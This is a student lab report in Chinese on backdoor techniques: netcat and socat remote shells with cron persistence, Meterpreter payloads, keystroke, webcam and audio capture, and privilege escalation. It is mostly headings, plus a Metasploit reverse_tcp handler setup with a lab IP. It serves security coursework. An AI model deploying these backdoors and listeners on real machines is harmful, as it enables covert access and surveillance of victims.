其他分享
首页 > 其他分享> > 2019-2020-2 网络对抗技术 20175224 Exp2 后门原理与实践

2019-2020-2 网络对抗技术 20175224 Exp2 后门原理与实践

作者:互联网

目录


一、实验内容说明及基础问题回答
二、工具准备

三、实验过程

四、问题与思考



 

一、实验内容说明及基础问题回答


1、实验内容
(1)使用netcat获取主机操作Shell,cron启动 (0.5分)

(2)使用socat获取主机操作Shell, 任务计划启动 (0.5分)

(3)使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell(0.5分)

(4)使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权 (2分)

(5)可选加分内容:使用MSF生成shellcode,注入到实践1中的pwn1中,获取反弹连接Shell(1分)加分内容一并写入本实验报告。

2、基础问题回答
1)例举你能想到的一个后门进入到你系统中的可能方式?

(2)例举你知道的后门如何启动起来(win及linux)的方式?

(3)Meterpreter有哪些给你映像深刻的功能?

(4)如何发现自己有系统有没有被安装后门?



二、工具准备


Windows获得Linux shell

Linux 获得Windows shell

使用nc传输数据


 

三、实验过程

使用netcat获取主机操作Shell,cron启动

 

 

使用socat获取主机操作Shell, 任务计划启动

socatncat的增强版,它使用的格式是socat [options] <address> <address>,其中两个address是必选项,而options 是可选项。
socat的基本功能就是建立两个双向的字节流,数据就在其间传输,参数address就是代表了其中的一个方向。所谓流,代表了数据的流向,而数据则可以有许多不同的类型,命令中也就相应需要许多选项对各种不同的类型数据流进行限定与说明。

 

使用MSF meterpreter生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell

 

使用MSF meterpreter生成获取目标主机音频、摄像头、击键记录等内容

 

可选加分内容:使用MSF生成shellcode,注入到实践1中的pwn1中,获取反弹连接Shell

use exploit/multi/handler    /*进入handler模式*/

set payload linux/x86/meterpreter/reverse_tcp  /*对应生成的后门程序设置payload*/

show options  /*查看当前信息状态*/

set LHOST 192.168.182.128  /*设置LHOST,其中ip为攻击者Linux的ip*/

set LPORT 5224 /*设置LPORT*/

exploit /*启动监听*/

  



 

四、问题与思考

实验中遇到的问题

实验体会

        本次实验做的是后门,这次实验的原理比第一次实验要容易理解一些,不过操作起来因为要使用到软件所以较第一次会麻烦一点。通过本次实验,我对相关知识的掌握程度明显有所提高,能学习到很多东西,这无疑是很让人开心的。

        感觉这次的实验也很有趣,期待接下来的学习!

标签:Shell,socat,Windows,Exp2,使用,5224,20175224,2020,主机
来源: https://www.cnblogs.com/axyaxy/p/12503668.html